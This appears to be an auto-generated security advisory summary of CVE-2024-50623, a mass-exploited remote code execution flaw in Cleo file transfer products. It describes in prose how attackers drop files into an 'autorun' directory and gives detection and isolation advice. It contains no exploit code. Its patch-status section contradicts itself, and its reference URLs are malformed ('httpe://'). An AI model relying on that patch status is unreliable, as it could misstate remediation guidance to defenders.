Full Report
Users of Cleo-managed file transfer software are being urged to ensure that their instances are not exposed to the internet following reports of mass exploitation of a vulnerability affecting fully patched systems. Cybersecurity company Huntress said it discovered evidence of threat actors exploiting the issue en masse on December 3, 2024. The vulnerability, which impacts Cleo's LexiCom,
Analysis Summary
# Vulnerability: Unauthenticated Remote Code Execution in Cleo File Transfer Software
## CVE Details
- CVE ID: CVE-2024-50623 (Plus one additional advisory issued for a related, pending CVE)
- CVSS Score: Not explicitly provided, but described as leading to Remote Code Execution (RCE).
- CWE: Unrestricted File Upload (implied source, leading to RCE)
## Affected Systems
- Products: Cleo LexiCom, Cleo VLTransfer (VLTrader), Cleo Harmony
- Versions: Up to version 5.8.0.23 for all listed products.
- Configurations: Instances exposed directly to the internet are at high risk.
## Vulnerability Description
The primary vulnerability (CVE-2024-50623) stems from an **unrestricted file upload** flaw that enables unauthenticated attackers to achieve **Remote Code Execution (RCE)**. Threat actors can exploit this by placing malicious files in the `"autorun"` sub-directory within the installation folder. The susceptible software immediately reads, interprets, and evaluates files in this directory.
A separate, related vulnerability, also leading to RCE via an unauthenticated vector, has been identified and is pending a CVE assignment. Patches released for CVE-2024-50623 are reported as **not completely mitigating** the underlying flaw, suggesting a second vulnerability requires immediate attention or remediation.
## Exploitation
- Status: **Exploited in the wild** (Mass exploitation reported starting December 3, 2024).
- Complexity: Implied Low, given successful mass exploitation by threat actors.
- Attack Vector: Network (RCE).
## Impact
- Confidentiality: High (Likely enables data exfiltration after RCE is achieved).
- Integrity: High (Arbitrary code execution allows system modification).
- Availability: High (System compromise via RCE).
## Remediation
### Patches
- **CVE-2024-50623 Patch:** Not explicitly detailed in the summary, but expected to be released "later this week" (relative to the article date). Users should monitor Cleo advisories for specific version updates that fully resolve the issue.
- **Second Vulnerability:** A patch for the second, separate RCE vulnerability is also pending.
### Workarounds
- **Crucial Strategy:** Users are strongly urged to **ensure their Cleo instances are not exposed to the internet.**
- Isolate affected servers from external network access pending confirmed, complete vendor patches.
## Detection
- **Indicators of Compromise (IOCs):** The observed exploitation involved attackers dropping XML files that contained embedded PowerShell commands. These commands were used to retrieve and execute a next-stage **Java Archive (JAR) file** from a remote server.
- **Detection Methods and Tools:** Monitor file system changes within the Cleo installation directories, specifically the `"autorun"` sub-directory, for suspicious file uploads (e.g., XML files with embedded scripts). Network monitoring should look for outbound connections retrieving JAR files from unknown external endpoints following file modification on the host.
## References
- Vendor Advisory (CVE-2024-50623): httpe://support.cleo.com/hc/en-us/articles/27140294267799-Cleo-Product-Security-Advisory-CVE-2024-50623
- Vendor Advisory (CVE Pending): httpe://support.cleo.com/hc/en-us/articles/28408134019735-Cleo-Product-Security-Advisory-CVE-Peding
- Huntress Threat Advisory: httpe://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild